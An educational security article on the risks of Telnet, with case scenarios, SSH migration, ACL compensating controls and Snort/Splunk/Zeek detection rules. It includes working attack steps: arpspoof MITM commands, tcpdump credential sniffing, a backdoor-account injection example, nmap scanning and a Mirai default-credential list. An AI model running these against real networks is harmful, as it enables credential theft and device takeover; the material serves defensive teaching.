The most obvious vulnerability: everything is transmitted in plaintext. This includes not just the login credentials but every command typed, every command output returned, every file listed or displayed, every configuration viewed. An attacker who captures a single administrative Telnet session may walk away with:

• ›Root or administrative credentials for the device
• ›The complete network topology from show running-config output
• ›Other credentials entered during the session (database passwords, API keys)
• ›Internal hostnames, IP addressing schemes, VLAN configurations
• ›File contents if the admin ran cat, more, or similar commands

Telnet provides no message integrity checking. An attacker performing an active MITM attack (via ARP spoofing, for example) can not only read traffic but inject arbitrary commands into the stream. Because the protocol has no way to detect tampering, the server will execute injected commands as if they came from the legitimate user.

A practical attack scenario: an attacker is performing ARP spoofing between an admin workstation and a router. The admin logs in and issues routine commands. The attacker waits, then injects a command to create a new backdoor user account or disable an ACL before the admin's session ends. The admin sees nothing unusual.

# Conceptual injection during active MITM
# Legitimate admin traffic flowing through attacker's machine
Admin → Router: "show version\n"          ← pass through
Attacker injects: "username backdoor secret P@ss\n"
Admin → Router: "show ip interface brief\n" ← pass through
# Router creates backdoor account silently

Telnet has no mechanism to verify that the server you're connecting to is actually the device you intend to reach. An attacker who can intercept or redirect your connection (through ARP poisoning, BGP hijacking, rogue DHCP, or simply plugging in a laptop) can present a fake Telnet login prompt. The user, seeing the familiar login: prompt, types their credentials — which the attacker now possesses. The attacker can simultaneously relay the connection to the real server so the user sees a normal session.

SSH solves this with host key fingerprinting: the first time you connect, you store the server's public key, and every subsequent connection verifies it matches. Telnet has no equivalent. There is no way to know if the device you're talking to is authentic.

Because Telnet sessions are cleartext and contain no session-specific tokens or timestamps, a recorded session can potentially be replayed. More practically, captured credentials can be directly reused — there is no challenge-response mechanism, no one-time tokens, no cryptographic proof that the credentials are being used by the original legitimate user at this moment in time.

This is qualitatively different from protocols that use token-based or cryptographic authentication: even if you capture the exchange, you cannot reuse it. With Telnet, you capture the plaintext credentials and simply log in yourself.

tcpdump captures packets matching a filter. Port 23 is Telnet. The -A flag prints packet contents in ASCII, making credentials immediately readable. The -w flag saves to a file for later analysis in Wireshark.

# Live capture on eth0, port 23, ASCII output
tcpdump -i eth0 port 23 -A
IP 192.168.1.50.54321 > 192.168.1.1.23: Flags [P.]
  [email protected].........
  admin
IP 192.168.1.50.54321 > 192.168.1.1.23: Flags [P.]
  P@ssword123

# Save capture to file for Wireshark analysis
tcpdump -i eth0 port 23 -w telnet_capture.pcap

# Read saved capture
tcpdump -r telnet_capture.pcap -A

In Wireshark, filter for Telnet traffic and follow the TCP stream to read the full session. The "Follow TCP Stream" function is the key tool — it reassembles the bidirectional session into a readable transcript, clearly distinguishing client-sent data (typically blue) from server-sent data (typically red).

# Wireshark display filter — show only Telnet
telnet

# Alternative: filter by port directly
tcp.port == 23

# Right-click any Telnet packet → Follow → TCP Stream
Ubuntu 22.04 LTS router1 ttyS0

login: admin
Password: CiscoAdmin2024!
router1#show ip route
Codes: C - connected, S - static, R - RIP ...
      10.0.0.0/8 is variably subnetted
C     10.10.1.0/24 is directly connected, GigabitEthernet0/1
# Full network topology now visible to attacker

On modern switched networks, traffic is only forwarded to the intended port. ARP spoofing (also called ARP cache poisoning) exploits the stateless, unauthenticated nature of ARP to poison the ARP caches of both the victim and the gateway, routing traffic through the attacker's machine. This is a prerequisite for sniffing Telnet on most modern networks.

# Enable IP forwarding so we relay traffic (victim stays connected)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Poison victim's ARP cache: tell .50 that the gateway (.1) is us
arpspoof -i eth0 -t 192.168.1.50 192.168.1.1

# Poison gateway's ARP cache: tell .1 that .50's MAC is ours
arpspoof -i eth0 -t 192.168.1.1 192.168.1.50

# Now all traffic between .50 and .1 passes through us
# Capture Telnet session simultaneously
tcpdump -i eth0 host 192.168.1.50 and port 23 -A

Tools like ettercap and bettercap combine ARP spoofing and credential harvesting into a single automated workflow, significantly lowering the skill threshold for this attack.

SSH provides functionally identical remote access to Telnet but wraps everything in an encrypted tunnel. The contrast between what a sniffer sees for each protocol illustrates why encryption is non-negotiable.

# TELNET — everything in cleartext, immediately readable
login: admin | Password: SuperSecret99!  ← readable on wire
router1# show running-config             ← all commands visible

# SSH — same session, encrypted
SSH-2.0-OpenSSH_9.0                      ← version banner only
Encrypted payload: \xd3\x8f\x2a\x11...   ← unreadable ciphertext

# Disabling Telnet and enabling SSH on a Cisco device:
Router(config)# no service telnet
Router(config)# line vty 0 4
Router(config-line)# transport input ssh
Router(config-line)# login local
Router(config)# ip ssh version 2
Router(config)# crypto key generate rsa modulus 2048

Before sniffing, a penetration tester or attacker first identifies which hosts on the network are running Telnet. Nmap is the standard tool for this. Finding port 23 open is itself a finding — the sniffing attack is what turns that finding into credential compromise.

# Scan entire subnet for Telnet (port 23)
nmap -p 23 --open 192.168.1.0/24
PORT   STATE SERVICE
23/tcp open  telnet
MAC Address: 00:1A:2B:3C:4D:5E (Cisco Systems)

# Service version detection — identify device type
nmap -p 23 -sV 192.168.1.1
23/tcp open  telnet  Cisco router telnetd

# Banner grab — read the login prompt manually
nc 192.168.1.1 23
Authorised users only. This system is monitored.
User Access Verification
Username:

Consider a mid-size enterprise that upgraded its core routing infrastructure to modern hardware but retained older distribution-layer switches purchased in 2008. These switches have SSH disabled (the SSH module was never licensed or configured) and are managed exclusively via Telnet. The network team connects to them regularly from a Windows admin workstation on the same VLAN.

An attacker who compromises any single host on that management VLAN — perhaps through a phishing email that executes malware — can run ARP spoofing silently in the background. Every subsequent Telnet session from the admin workstation to any of those switches passes through the attacker's machine. Within days, the attacker has credentials to the entire distribution layer, the VLANs those switches serve, and potentially the routing tables of the entire campus network.

A water treatment facility uses PLCs (Programmable Logic Controllers) installed in 2004 that expose a Telnet management interface. These devices run a proprietary embedded OS that cannot be updated or patched; the vendor went out of business. The SCADA network was originally air-gapped but a "temporary" connection to the corporate network was made in 2015 for remote monitoring and was never removed.

The Telnet credentials for the PLCs were never changed from factory defaults (a common finding: admin/admin or root/root). Any employee on the corporate network — or any attacker who reaches the corporate network — can reach the SCADA network. There is no encryption, no authentication hardening, and no monitoring of Telnet sessions.

This scenario closely mirrors the 2021 Oldsmar water treatment facility incident, where an attacker accessed SCADA systems remotely and attempted to increase sodium hydroxide levels to dangerous concentrations. While that specific incident involved TeamViewer rather than Telnet, the underlying principle — legacy industrial systems with no meaningful authentication or encryption on the management plane — is identical.

A hotel's network team manages its property management system (PMS) and building automation systems over a flat internal network. Several legacy door-lock controllers and the building HVAC management interface expose Telnet. A disgruntled IT contractor who retains network access after their engagement ends connects remotely via VPN and runs a passive capture during business hours.

Because the network is flat (no VLAN segmentation between management and guest networks), the contractor can also observe cleartext traffic from guests who connect to the internal corporate wireless network that shares the same broadcast domain. FTP transfers of financial documents, plain-HTTP internal applications, and Telnet admin sessions are all visible simultaneously.

This scenario highlights a compounding risk: Telnet is not just dangerous in isolation. It is catastrophic when combined with poor network segmentation, which is a ubiquitous finding in assessments of hospitality, retail, and small-to-mid enterprise environments.

A warehouse deploys 200 network-enabled label printers, barcode scanners, and environmental sensors from a single vendor. The devices ship with Telnet enabled on port 23 and a hardcoded default password admin/1234. The IT team deploys them without reviewing their management interfaces, because "they're just printers."

The 2016 Mirai botnet demonstrated exactly this attack at scale: it scanned the public internet for devices with default Telnet credentials, compromised them automatically, and assembled them into a botnet responsible for the largest DDoS attack in history at the time (1.2 Tbps against Dyn DNS). Mirai's source code, released publicly, hard-coded 62 default username/password pairs specifically targeting Telnet-enabled IoT devices.

# Mirai-style credential scanning (conceptual — do not replicate)
# Mirai tried combinations like these against port 23:
admin:admin  |  root:root  |  admin:1234  |  root:vizxv
admin:  |  admin:password  |  root:12345  |  guest:guest
ubnt:ubnt  |  support:support  |  user:user
# Any match = compromised node added to botnet

The lesson is that Telnet risk is not limited to traditional IT environments. Any device category — printer, camera, sensor, HVAC controller — that exposes Telnet with default credentials is an entry point.

The only complete remediation is to disable Telnet and enable SSH. SSH v2 with strong ciphers (AES-256, ECDH key exchange, SHA-2 MAC) provides encryption, integrity, and server authentication. SSH key-based authentication eliminates the password entirely, removing credential theft as an attack vector.

# Linux — disable telnetd, enable sshd
sudo systemctl stop telnet.socket
sudo systemctl disable telnet.socket
sudo systemctl enable ssh --now

# Cisco IOS — force SSH only on VTY lines
Router(config)# line vty 0 15
Router(config-line)# transport input ssh
Router(config-line)# exec-timeout 5 0
Router(config)# no service telnet
Router(config)# ip ssh version 2
Router(config)# ip ssh time-out 60
Router(config)# ip ssh authentication-retries 3

# Verify Telnet is no longer reachable
nmap -p 23 192.168.1.1
23/tcp closed telnet

Where devices cannot be migrated from Telnet (end-of-life hardware, ICS/OT systems, devices with no SSH support), the risk must be managed through network controls. Isolate the device on a dedicated management VLAN accessible only from a jump host or bastion server. Apply strict ACLs that permit Telnet only from specific source IPs.

# Cisco ACL — permit Telnet only from jump host (10.0.0.254)
Router(config)# ip access-list extended MGMT-TELNET
Router(config-ext-nacl)# permit tcp host 10.0.0.254 any eq 23
Router(config-ext-nacl)# deny tcp any any eq 23 log
Router(config-ext-nacl)# permit ip any any
Router(config)# interface GigabitEthernet0/0
Router(config-if)# ip access-group MGMT-TELNET in

# The jump host itself must use SSH or MFA to connect
# This doesn't encrypt Telnet — it limits who can attempt it

This is a compensating control, not a fix. Telnet traffic from the jump host to the device is still cleartext. The jump host becomes a high-value target. Document this as a residual risk and schedule hardware replacement.

In environments where Telnet cannot be immediately eliminated, configure network monitoring and SIEM alerting to detect any Telnet sessions. If Telnet must exist, every session should be a known, expected event — an unexpected Telnet connection is an immediate incident.

# Snort/Suricata rule — alert on any Telnet connection attempt
alert tcp any any -> any 23 (msg:"TELNET connection attempt";
  flow:to_server,established;
  sid:1000001; rev:1;)

# Splunk SPL — detect Telnet in network flow data
index=network dest_port=23
| stats count by src_ip, dest_ip, dest_port
| where count > 0

# Zeek (Bro) — log all Telnet sessions automatically
# Zeek logs to telnet.log with src, dst, user, password fields